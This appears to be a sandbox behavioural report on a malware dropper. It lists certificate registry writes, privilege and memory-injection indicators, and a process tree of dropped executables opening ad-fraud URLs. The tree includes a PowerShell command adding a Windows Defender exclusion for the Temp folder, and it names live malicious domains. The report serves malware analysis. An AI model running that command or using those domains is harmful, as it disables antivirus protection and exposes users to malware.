160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun150faeb3537d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a services64.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 160 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
Processes:
GcleanerEU.exeinstaller.exeanyname.exegcleaner.exepid process 3492 GcleanerEU.exe 3628 installer.exe 3724 anyname.exe 3832 gcleaner.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
cmd.exepowershell.exeWerFault.exepid process 1892 cmd.exe 1892 cmd.exe 764 powershell.exe 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1208 WerFault.exe 1208 WerFault.exe 1208 WerFault.exe 1208 WerFault.exe 1208 WerFault.exe 1208 WerFault.exe 1208 WerFault.exe 1208 WerFault.exe 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 1240 -
Suspicious behavior: GetForegroundWindowSpam 8 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeiexplore.exepid process 1240 1208 WerFault.exe 2948 WerFault.exe 2440 WerFault.exe 2708 WerFault.exe 1920 WerFault.exe 2796 WerFault.exe 744 iexplore.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
cmd.exeuwbfggwpid process 1892 cmd.exe 3692 uwbfggw -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
2170890.exepid process 2872 2170890.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Sun150faeb3537d.exeSun157ff8e4440aa.exepowershell.exeSun1584240df9fe73a3.exe7056889.exeKuwicakiqy.exePublicDwlBrowser1100.exe1366689.exeWerFault.exe8.exeBearVpn 3.exetaskkill.exetaskkill.exetaskkill.exepostback.exedescription pid process Token: SeCreateTokenPrivilege 2064 Sun150faeb3537d.exe Token: SeAssignPrimaryTokenPrivilege 2064 Sun150faeb3537d.exe Token: SeLockMemoryPrivilege 2064 Sun150faeb3537d.exe Token: SeIncreaseQuotaPrivilege 2064 Sun150faeb3537d.exe Token: SeMachineAccountPrivilege 2064 Sun150faeb3537d.exe Token: SeTcbPrivilege 2064 Sun150faeb3537d.exe Token: SeSecurityPrivilege 2064 Sun150faeb3537d.exe Token: SeTakeOwnershipPrivilege 2064 Sun150faeb3537d.exe Token: SeLoadDriverPrivilege 2064 Sun150faeb3537d.exe Token: SeSystemProfilePrivilege 2064 Sun150faeb3537d.exe Token: SeSystemtimePrivilege 2064 Sun150faeb3537d.exe Token: SeProfSingleProcessPrivilege 2064 Sun150faeb3537d.exe Token: SeIncBasePriorityPrivilege 2064 Sun150faeb3537d.exe Token: SeCreatePagefilePrivilege 2064 Sun150faeb3537d.exe Token: SeCreatePermanentPrivilege 2064 Sun150faeb3537d.exe Token: SeBackupPrivilege 2064 Sun150faeb3537d.exe Token: SeRestorePrivilege 2064 Sun150faeb3537d.exe Token: SeShutdownPrivilege 2064 Sun150faeb3537d.exe Token: SeDebugPrivilege 2064 Sun150faeb3537d.exe Token: SeAuditPrivilege 2064 Sun150faeb3537d.exe Token: SeSystemEnvironmentPrivilege 2064 Sun150faeb3537d.exe Token: SeChangeNotifyPrivilege 2064 Sun150faeb3537d.exe Token: SeRemoteShutdownPrivilege 2064 Sun150faeb3537d.exe Token: SeUndockPrivilege 2064 Sun150faeb3537d.exe Token: SeSyncAgentPrivilege 2064 Sun150faeb3537d.exe Token: SeEnableDelegationPrivilege 2064 Sun150faeb3537d.exe Token: SeManageVolumePrivilege 2064 Sun150faeb3537d.exe Token: SeImpersonatePrivilege 2064 Sun150faeb3537d.exe Token: SeCreateGlobalPrivilege 2064 Sun150faeb3537d.exe Token: 31 2064 Sun150faeb3537d.exe Token: 32 2064 Sun150faeb3537d.exe Token: 33 2064 Sun150faeb3537d.exe Token: 34 2064 Sun150faeb3537d.exe Token: 35 2064 Sun150faeb3537d.exe Token: SeDebugPrivilege 1128 Sun157ff8e4440aa.exe Token: SeDebugPrivilege 764 powershell.exe Token: SeDebugPrivilege 944 Sun1584240df9fe73a3.exe Token: SeDebugPrivilege 2684 7056889.exe Token: SeDebugPrivilege 1644 Kuwicakiqy.exe Token: SeDebugPrivilege 1760 PublicDwlBrowser1100.exe Token: SeShutdownPrivilege 1240 Token: SeDebugPrivilege 2908 1366689.exe Token: SeShutdownPrivilege 1240 Token: SeDebugPrivilege 1208 WerFault.exe Token: SeShutdownPrivilege 1240 Token: SeDebugPrivilege 1160 8.exe Token: SeDebugPrivilege 2832 BearVpn 3.exe Token: SeDebugPrivilege 2384 taskkill.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeDebugPrivilege 1640 taskkill.exe Token: SeDebugPrivilege 2660 postback.exe Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 Token: SeShutdownPrivilege 1240 -
Suspicious use of FindShellTrayWindow 16 IoCs
Processes:
setup_2.tmpultramediaburner.tmpiexplore.exeinstaller.exepid process 3016 setup_2.tmp 2060 ultramediaburner.tmp 1240 1240 1240 1240 1240 1240 1240 1240 744 iexplore.exe 3628 installer.exe 1240 1240 744 iexplore.exe 744 iexplore.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
pid process 1240 1240 1240 1240 -
Suspicious use of SetWindowsHookEx 18 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEpid process 744 iexplore.exe 744 iexplore.exe 2776 IEXPLORE.EXE 2776 IEXPLORE.EXE 2776 IEXPLORE.EXE 2776 IEXPLORE.EXE 744 iexplore.exe 744 iexplore.exe 3436 IEXPLORE.EXE 3436 IEXPLORE.EXE 3436 IEXPLORE.EXE 3436 IEXPLORE.EXE 744 iexplore.exe 744 iexplore.exe 8568 IEXPLORE.EXE 8568 IEXPLORE.EXE 8568 IEXPLORE.EXE 8568 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.exedescription pid process target process PID 1888 wrote to memory of 1680 1888 setup_x86_x64_install.exe setup_installer.exe PID 1888 wrote to memory of 1680 1888 setup_x86_x64_install.exe setup_installer.exe PID 1888 wrote to memory of 1680 1888 setup_x86_x64_install.exe setup_installer.exe PID 1888 wrote to memory of 1680 1888 setup_x86_x64_install.exe setup_installer.exe PID 1888 wrote to memory of 1680 1888 setup_x86_x64_install.exe setup_installer.exe PID 1888 wrote to memory of 1680 1888 setup_x86_x64_install.exe setup_installer.exe PID 1888 wrote to memory of 1680 1888 setup_x86_x64_install.exe setup_installer.exe PID 1680 wrote to memory of 740 1680 setup_installer.exe setup_install.exe PID 1680 wrote to memory of 740 1680 setup_installer.exe setup_install.exe PID 1680 wrote to memory of 740 1680 setup_installer.exe setup_install.exe PID 1680 wrote to memory of 740 1680 setup_installer.exe setup_install.exe PID 1680 wrote to memory of 740 1680 setup_installer.exe setup_install.exe PID 1680 wrote to memory of 740 1680 setup_installer.exe setup_install.exe PID 1680 wrote to memory of 740 1680 setup_installer.exe setup_install.exe PID 740 wrote to memory of 1476 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1476 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1476 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1476 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1476 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1476 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1476 740 setup_install.exe cmd.exe PID 740 wrote to memory of 380 740 setup_install.exe cmd.exe PID 740 wrote to memory of 380 740 setup_install.exe cmd.exe PID 740 wrote to memory of 380 740 setup_install.exe cmd.exe PID 740 wrote to memory of 380 740 setup_install.exe cmd.exe PID 740 wrote to memory of 380 740 setup_install.exe cmd.exe PID 740 wrote to memory of 380 740 setup_install.exe cmd.exe PID 740 wrote to memory of 380 740 setup_install.exe cmd.exe PID 740 wrote to memory of 632 740 setup_install.exe cmd.exe PID 740 wrote to memory of 632 740 setup_install.exe cmd.exe PID 740 wrote to memory of 632 740 setup_install.exe cmd.exe PID 740 wrote to memory of 632 740 setup_install.exe cmd.exe PID 740 wrote to memory of 632 740 setup_install.exe cmd.exe PID 740 wrote to memory of 632 740 setup_install.exe cmd.exe PID 740 wrote to memory of 632 740 setup_install.exe cmd.exe PID 740 wrote to memory of 856 740 setup_install.exe cmd.exe PID 740 wrote to memory of 856 740 setup_install.exe cmd.exe PID 740 wrote to memory of 856 740 setup_install.exe cmd.exe PID 740 wrote to memory of 856 740 setup_install.exe cmd.exe PID 740 wrote to memory of 856 740 setup_install.exe cmd.exe PID 740 wrote to memory of 856 740 setup_install.exe cmd.exe PID 740 wrote to memory of 856 740 setup_install.exe cmd.exe PID 1476 wrote to memory of 764 1476 cmd.exe powershell.exe PID 1476 wrote to memory of 764 1476 cmd.exe powershell.exe PID 1476 wrote to memory of 764 1476 cmd.exe powershell.exe PID 1476 wrote to memory of 764 1476 cmd.exe powershell.exe PID 740 wrote to memory of 1780 740 setup_install.exe cmd.exe PID 1476 wrote to memory of 764 1476 cmd.exe powershell.exe PID 1476 wrote to memory of 764 1476 cmd.exe powershell.exe PID 740 wrote to memory of 1780 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1780 740 setup_install.exe cmd.exe PID 1476 wrote to memory of 764 1476 cmd.exe powershell.exe PID 740 wrote to memory of 1780 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1780 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1780 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1780 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1308 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1308 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1308 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1308 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1308 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1308 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1308 740 setup_install.exe cmd.exe PID 740 wrote to memory of 1640 740 setup_install.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\7zS09618E34\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS09618E34\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152260a303c33a7.exe4⤵
- Loads dropped DLL
PID:380 -
C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun152260a303c33a7.exeSun152260a303c33a7.exe5⤵
- Executes dropped EXE
PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15d8dfe2c6d17.exe4⤵PID:632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15b61bf18b0f1.exe4⤵
- Loads dropped DLL
PID:1780 -
C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun15b61bf18b0f1.exeSun15b61bf18b0f1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1412 -
C:\Users\Admin\AppData\Local\Temp\is-K9O55.tmp\Sun15b61bf18b0f1.tmp"C:\Users\Admin\AppData\Local\Temp\is-K9O55.tmp\Sun15b61bf18b0f1.tmp" /SL5="$5013A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun15b61bf18b0f1.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1064 -
C:\Users\Admin\AppData\Local\Temp\is-4EU9F.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-4EU9F.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2600 -
C:\Program Files\Reference Assemblies\KWBBASTOMS\ultramediaburner.exe"C:\Program Files\Reference Assemblies\KWBBASTOMS\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\is-9A8O1.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-9A8O1.tmp\ultramediaburner.tmp" /SL5="$30194,281924,62464,C:\Program Files\Reference Assemblies\KWBBASTOMS\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2060 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
PID:1680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fa-c10e0-520-8a19e-2dfc26c309299\Kuwicakiqy.exe"C:\Users\Admin\AppData\Local\Temp\fa-c10e0-520-8a19e-2dfc26c309299\Kuwicakiqy.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1644 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:744 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:744 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2776
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:744 CREDAT:3224628 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3436
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:744 CREDAT:2438165 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:8568
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:744 CREDAT:1586209 /prefetch:210⤵PID:2416
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:744 CREDAT:3945508 /prefetch:210⤵PID:3320
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:744 CREDAT:3945570 /prefetch:210⤵PID:3404
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:3680
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵PID:8540
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵PID:3088
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:1468
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:8520
-
-
